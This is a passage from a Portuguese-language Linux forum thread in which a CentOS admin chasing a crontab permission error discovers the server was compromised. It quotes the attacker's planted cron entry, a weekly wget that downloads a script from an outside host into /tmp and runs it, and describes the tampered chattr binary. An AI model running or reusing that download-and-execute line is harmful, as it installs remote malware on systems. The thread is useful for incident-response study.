crontab: Permissão negada [RESOLVIDO]

13. Re: crontab: Permissão negada

Wagner
wgmadeira

(usa CentOS)

Enviado em 28/01/2015 - 19:46h


[root@SV01 scripts]# id root
uid=0(root) gid=0(root) grupos=0(root),502(cron)
[root@SV01 scripts]# id $user
uid=0(root) gid=0(root) grupos=0(root),502(cron)



  


14. Re: crontab: Permissão negada [RESOLVIDO]

Carlos APC
Carlos_Cunha

(usa Linux Mint)

Enviado em 28/01/2015 - 19:53h

Teste isso:
chattr -i /usr/bin/crontab

#-------------------------------------------------------------------------------------#

"Linux é algo que me fez ter Gosto pela Informática, se tornou um Vicio" - Carlos A. P. Cunha


15. Re: crontab: Permissão negada [RESOLVIDO]

Wagner
wgmadeira

(usa CentOS)

Enviado em 28/01/2015 - 19:55h

O erro persiste, segue a saída.

[root@SV01 ~]# chattr -i /usr/bin/crontab
-bash: /usr/bin/chattr: Permissão negada



16. Re: crontab: Permissão negada [RESOLVIDO]

Carlos APC
Carlos_Cunha

(usa Linux Mint)

Enviado em 28/01/2015 - 19:58h

Execute


type chattr


Caminho que der (exemplo = /usr/bin/chattr)
execute


ls -l CAMINHO


#-------------------------------------------------------------------------------------#

"Linux é algo que me fez ter Gosto pela Informática, se tornou um Vicio" - Carlos A. P. Cunha


17. Re: crontab: Permissão negada

Wagner
wgmadeira

(usa CentOS)

Enviado em 28/01/2015 - 20:44h

Prezados,

Resolvido, segue as observações.

Ao entrar na pasta /usr/bin/ notei que as permissões do arquivo chattr estavam erradas.


[root@SV01]# ls -l /usr/bin/chattr
---------- 1 root root 14136 Nov 22 2013 /usr/bin/chattr

E existia outro arquivo com um ponto no final (chattr.)

[root@SV01]# ls -l /usr/bin/chattr.
-rwxr-xr-x 1 root root 14136 Out 12 00:56 /usr/bin/chattr.

Com este arquivo consegui executar os comandos com sucesso:

[root@SV01]# /usr/bin/chattr. -ais /usr/bin/crontab
[root@SV01]# chmod 4755 /usr/bin/crontab

Porem algo ainda mais estranho ainda aconteceu, ao executar o comando "crontab -e" achei a seguinte linha no agendamento:

@weekly wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1

E ainda dentro da pasta tmp existia alguns arquivos que desconhecia.

[root@GVSV02 tmp]# ls -la
total 28
drwxrwxrwt. 4 root root 4096 Jan 29 21:35 .
dr-xr-xr-x. 29 root root 4096 Jan 28 18:26 ..
-rw------- 1 root root 12288 Jan 28 19:16 .fcr-YlrUtk.swp
drwxrwxrwt 2 root root 4096 Jan 28 18:26 .ICE-unix
drwxr-xr-x. 2 root root 4096 Jan 28 19:10 .webmin

Dentro do arquivo .fcr-YlrUtk.swp tinha essas linhas estranhas.

[root@SV01 tmp]# cat .fcr-YlrUtk.swp
U3210#"! Utadßÿÿξg-á½ ~}vjG4$## * * * * *# * * * * * us# * * * * * user-name command # * * * # * *# * * * * * user-name comman# * * * * * user-name co# * * * * * user-name command t# * * * * * user-name command# * * * * * user-name command to be e# * * * * * user-name command to be executed# | | # * * * * * user-name command to be executed# | | | | |# | | | | .---- d# * * * * *# * * * * * user-name command to be executed


Removi a linha no crontab, alterei a senha de root por segurança, limpei a pasta /tmp e instalei o Clamav Antivírus.

Vi em alguns fóruns que pode se tratar de uma invasão. Estou preocupado pois a senha é forte e tem firewall. O que realmente pode ter acontecido?


18. Re: crontab: Permissão negada

Carlos APC
Carlos_Cunha

(usa Linux Mint)

Enviado em 28/01/2015 - 20:47h

Foi exatamente isso que pedi no meu ultimo cometário :-D
Para checar as permissões do comando chattr.

Sim, seu servidor foi invadido sem duvida alguma.


#-------------------------------------------------------------------------------------#

"Linux é algo que me fez ter Gosto pela Informática, se tornou um Vicio" - Carlos A. P. Cunha


19. Re: crontab: Permissão negada [RESOLVIDO]

Carlos APC
Carlos_Cunha

(usa Linux Mint)

Enviado em 28/01/2015 - 21:33h

Beleza, amigo marque como resolve e a melhor resposta.
Abraço

#-------------------------------------------------------------------------------------#

"Linux é algo que me fez ter Gosto pela Informática, se tornou um Vicio" - Carlos A. P. Cunha


20. Re: crontab: Permissão negada [RESOLVIDO]

Perfil removido
removido

(usa Nenhuma)

Enviado em 28/01/2015 - 21:54h

Como a vulnerabilidade é desconhecida, o problema, se de fato sanado, pode voltar a acontecer.




01 02



Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts